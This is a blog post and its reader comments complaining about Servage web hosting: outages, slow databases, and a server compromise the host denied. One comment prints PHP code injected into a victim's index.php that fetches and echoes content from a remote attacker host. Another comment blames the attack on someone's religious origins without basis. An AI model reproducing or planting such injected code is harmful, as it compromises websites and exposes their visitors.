Today I ended my Servage problems
HostingI will start by saying a few words about the problems i had with Servage then i will continue with the solving of the problems. I signed up with Servage about 4 months ago after reading some reviews on various forums/blogs. The first impression was very good, the support was excellent, they answered my question real quick and i had no problems with the hosting whatsoever. This happiness lasted for about 1 and a half maybe 2 months.
Then my problems started to appear, the FTP was responding really hard, the transfers were getting lost, then the website started to have increased loading times on some periods of the day. Don’t get me wrong the problems were not present everyday or on every website i had hosted with them, it was today a site with problems, tomorrow another one, and i guess this happened because of their clustered structure. Mostly the loading problems were cause by the DB`s.
Then after the loading problems, the injection of malicious code problem came, which could of been handled better by them. For example they could of admitted that their server got hacked, but no… they had to tell the users who reported the hack that the problem is caused by the scripts and the file permissions that the users host. Also when i asked if this problem happened to anyone else, they told me that this did not happened to other users, which is a big lie, proven by the fact that users who also got hacked commented on my articles and confirmed their accounts got hacked too.
After the hacking problem i was going to switch to another hosting company, but because i paid for a 6 month hosting pack i decided to wait, and see how things evolve. Maybe everything was going to be ok. But guess what ? i was wrong, Loading problems with my websites again. So finally i decided to switch hosting. I was thinking at hostgator for some time because a friend of mine already was using hosting from them and he told me he never had any problems.
I ordered the “baby” plan from them which features unlimited domains allowed. My account was activate in about 20 minutes. The Servage control panel was pretty straight-forward so when i switched to CpanelX from hostgator i had some trouble setting everything up. I will do some short tutorials on the things that i had trouble with so others can learn from my experience.
I hope i don’t have anymore hosting issues, and everything will run smooth. If any problem comes up, i will blog about it.
later edit: just when i tried to publish this article, loading problems again
later edit: i forget to tell you, i left this blog hosted here at Servage because i still have a month or two of hosting, and i would like to see how things evolve here, when my hosting plan will expire, i will also move this blog to hostgator.
third later edit: i think they’re trying to sabotage me
) i know this sound strange and so unlikely but how can you explain that my blog is so unavailable, now after i published this article ?

an explanation for your blog beeing “so unavailable” now is the fact that they`re still full of problems
Hey, my site got hacked the same way yours did. I just submitted a ticket in the support system. They put this in my index.php:
if (extension_loaded(“curl”)) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, “http://100500.muchcool.info/inc.php?223″);
$r = curl_exec($ch);
curl_close($ch);
} else { $r=implode(“”,file(“http://100500.muchcool.info/inc.php?223″)); }
if($r) print $r;
Same issue here, was with servage for about 1.5 years.
Got the same hack as everyone else and no support from Servage.
Switched back to HostGator (again) and everything is going smooth so far.
Hopefully it stays that way!
I have the same problems with this server!!! I only installed forum and photo gallery and it is resolving so slow i wanna cry! Sometimes there is 404 error. In control panel it says: No such folder (www). I dont get it..what can I do about it?..Support is fast, but never helpfulL!
lesky the only solution to your problem is to move your websites at another hosting company
[...] 26. marts 2008: Today I ended my Servage problems [...]
Hi
I have been with Servage now a couple of years. Each time I have a problem they are so polite it’s kinda hard not to respond with gratefulness.
Lately though my Support Submissions I have been rather more frank with them, and they in turn are responding with a slight edge of sarcasm.
I pointed out a few problems I was experiencing. Not able to FTP, unable to login via their Captcha process and always had to perform at least two login process to access web space etcetera
This is the tip of the iceberg. It took me two days to set up a new email account, and to this day I have no idea other than the resolution which makes no sense at all, yes they were helpful in resolving the issue, but two days to set up a working POP3 access email account on one of my domains!
I commentated to them saying isn’t it weird, that every time one submits a support ticket, you always throw the problem back at the user, then within hours/days the problem mysteriously goes away.
I got a rather sarcastic response to that one.
I just received advanced renewal notice and have until the 24th of this month to decide what to do, problem is finding another company.
Anyone here had experience with 1&1 Internet (UK), I have a domain registered with them, but not ever used their web space packages.
I heard a user talking on a forum about http://rackspeed.de/ he was saying that they’re great and loading time is small. Don’t know what to say because i have no experience with them, but i think it’s worth trying.
Some days ago they updated webservers a on cluster, i got some strange errors on my site..everything looks like it has a br after it(text). and also session problems. They wont even answer me when i send a support ticket!
im going to change webhoster asap!
You know guys, I have read all these comments and I feel bad for all of you. I am currently in the same boat
I have been with servage for 3 years now and over those years have had a load of problems (Yes, I know, I should have switched long ago)…
Injections seem to be the biggest thing I’ve had problems with. Number of times, my sites have had malicious codes inserted into EVERY site I host, even my daughters website. The code included a new .htaccess file with a number of rewrites in it pointing mostly to “sovereign” folder which had a number of files in it including a “links.txt” file that shows hundreds of other websites involved in this porn site link scam.
I checked out about 20 or so of the sites listed in the links.txt and guess what, every one of them had ns1.servage.net as their dns.
I straight out asked servage 7 months ago and again this week if they’ve been hacked to which I got the following reply:
Hello Aaron,
Sorry for the inconveneicne caused. Due to the vast nature of the internet, we employ the same standard methods of safeguarding against malicious entry as all Web hosting companies. We are also currently in the process of a major upgrade of the hard- and software of the Webcluster that serves your account so that such does not happen again.
Thanks.
Kind Regards
John, Support
Servage Hosting
So again, as many of you have stated, they will NOT acknowledge that they;ve been hacked into. In fact, they WILL completely deny it even though it’s beyond obvious.
Is there nothing that we, as paying servage customers can do together to stop this from happening to others? If they take their security so lightly, perhaps a lawsuit should be in order?
I don’t know about the rest of you, but someone actually ended up getting full access to my cpanel and even created their own ftp accounts. They had access to every one of my mysql databases not to mention the passwords for each. All my, and my customers private information was completely open to them.
Your thoughts?
Servage really are bad. I had trouble for weeks with the span injections, and yes it was always my codes fault! All my sites are currently not working since being moved over to a new cluster. All php files that are requested prompt the user to download the source files! Servage are not doing anything to help this! TOTAL NIGHTMARE!
After my post, months ago, I stopped my hosting with Servage and moved my blog and small business site to Dreamhost.
There are a lot of opinions on Dreamhost, and yes, they’re not perfect, but they are one thing. Honest.
If a server’s been hacked, if there’s a power outage, if a HDD breaks down, they tell you honestly and apologize for the inconvenience.
100% uptime in basic shared hosting is a MYTH, and not even necessary for most sites. Safe hosting without extra code appearing from nowhere is.
As Lawrence (above) said, “Each time I have a problem they are so polite it’s kinda hard not to respond with gratefulness.”
To cut to the chase, the politeness is a defensive mechanism to cover total incompetence.
Servage has got to be in the category of one of the worse hosts to ever be connected to the net – their network security is a joke, support is like speaking to a brick wall (tho politely!), upgrades are designed to screw accounts and take months to resolve.
Servage are seriously bad news!!!
I left servage on the first of 2007, when all the sites on the same ip of my hosting was been hacked. After talk with the support about this issue (i think to be the first person to found the hacking) no one give me a good answer. I ask also if my password/private informations are stolen… sent many email and fax. NO ONE ANSWER! So i left him and now i’m very happy to be in other good isp!
Yes ok i might have a site intended for adults,and spend lost of cash on advertising and then all of the sudden i was hacked by someone with muslim origins, i mean i lost all members on the site over 1700, yes!
the problem now for me is to find adult web hosting at an affordable price, does anyone knows any, but please reply only if you have been with them for a while, no hear say, tired of waiting and hoping for the best on web hosting
thanks
Servage is the worst host, unsafe, jeopardizing your business and charging your credit card without authorization!
We have been with Servage for the entire hosting period and had nothing but problems.
* Mail-servers are blacklisted (proven) – yet – Servage say NO PROBLEM.
* They keep their data base UN-updated, sending utmost confidential material to the wrong address (proven)
* Yes you can cancel your account but what’s the point? Since Servage has your credit card details (that must be one of the few things they keep in their database to remember) they will just keep charging you!
WE? We have taken steps to press fraud charges against this first class customer support hosting company and leave you with making your own decision whether or not you want to waste your time, money and business with Servage!
Best of luck
Me too me too, after reading this I moved direct to hostgator. My sites at servage was down for the 5th time and now for more than 8 hours. I cried, I put my life in my sites, and they where unable.
